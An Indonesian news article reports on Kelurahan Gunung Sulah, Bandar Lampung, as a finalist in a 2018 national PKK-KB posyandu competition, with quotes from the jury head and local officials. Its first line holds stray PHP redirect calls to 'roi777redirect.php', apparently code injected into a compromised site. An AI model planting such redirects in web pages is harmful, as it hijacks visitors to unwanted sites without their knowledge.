header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Lomba Kesatuan Gerak PKK KB Tingkat Nasional, Kelurahan Gunung Sulah Target Juara -
Lomba Kesatuan Gerak PKK KB Tingkat Nasional, Kelurahan Gunung Sulah Target Juara

TRANSLAMPUNG.COM, BANDARLAMPUNG – KELURAHAN Gunung Sulah, Kecamatan Way Halim, Kota Bandarlampung menargetkan menjadi Kelurahan terbaik se-Indonesia. Dalam Lomba Kesatuan Gerak PKK KB Tingkat Nasional, dalam hal ini Kelurahan Gunung Sulah menjadi wakil Lampung dan bersaing dengan 6 Kota lainnya di Indonesia.

Lomba Kesrak PKK KB Kes Tingkat Nasional ini, diselenggarakan setiap tahun, sebagai rangkaian dalam peringatan Hari Keluarga Nasional (Harganas) tahun 2018. Dalam lomba ini, Kelurahan Gunung Sulah menjadi wakil Lampung dalam nominator Posyandu terbaik.

Ketua Tim Penilai Lomba Kesatuan Gerak PKK-KB- Kes tingkat nasional, Rahmawati Amrullah mengatakan, kedatangannya ke Bandarlampung untuk melakukan verifikasi lapangan.

“Perlombaan Kesrak PKK KB tingkat nasional ini khusus kategori posyandu,” kata dia, Senin (16/4).

Kegiatan ini juga dalam rangka memperingati Hari Keluarga Nasional ke-25 tahun 2018 yang akan dilaksanakan di Provinsi Sulawesi Utara.

“Tujuan utama perlombaan ini sebenarnya bukan meraih prestasi tapi bagaimana posyandu berkembang dengan baik di Bandarlampung,” tambah dia.

Rahmawati menjelaskan ada tiga poin indikator dalam lomba posyandu ini. Pertama inpun, bagaimana kebijakan berjenjang, provinsi, kota/kabupaten, kecamatan, kelurahan sampai tingkat posyandu itu sendiri.

Kemudian, sambung dia, indikator kedua adalah proses. Bagaimana proses pelatihan kader, jumlah kader, dan pembinaan posyandu. Ketiga adalah output. Bagaimana hasil prosentase persalinan dengan proses kesehatan, bagaimana prosentasi pemberina asi ekslusif.

“Kalau sudah memenuhi semua indikator itu saya yakin insya Allah Gunung Sulah terbaik,” jelas dia.

Dia berharap masuknya kelurahan Gunung Sulah, Bandarlampung sebagai nominator lomba posyandu harus dapat menjadi percontohan kota kabupaten di daerah Lampung.

Acara itu dihadir oleh Sekkot Badri Tamam, serta seluruh jajaran Pemkot Bandarlampung, dan forkopimda Bandarlampung.

Ketua Tim Penggerak PKK Kelurahan Gunung Sulah, Rubiyem Pranomo mengatakan, keunggulan posyandu yang diberi nama Sakura memiliki beberapa fasilitas, seperti spa bayo dan pijat akupresur.

“Diharapkan meningkatkan kunjungan ke posyandu dan menjadi motivasi kelurahan lain,” kata dia.

Sekkot Bandarlampung Badri Tamam mengatakan, perlombaan ini bertujuan memonitoring dan evaluasi sejauh mana kegiatan PKK di Bandar Lampung.

“Kemenangan lomba bukan tujun akhir tapi melalui kegiatan ini memberi dampak positif dalam meningkatkan pembangunan dari berbagai sektor di Kelurahan Gunung Sulah,” tutur dia. (jef/hkw)

News Reporter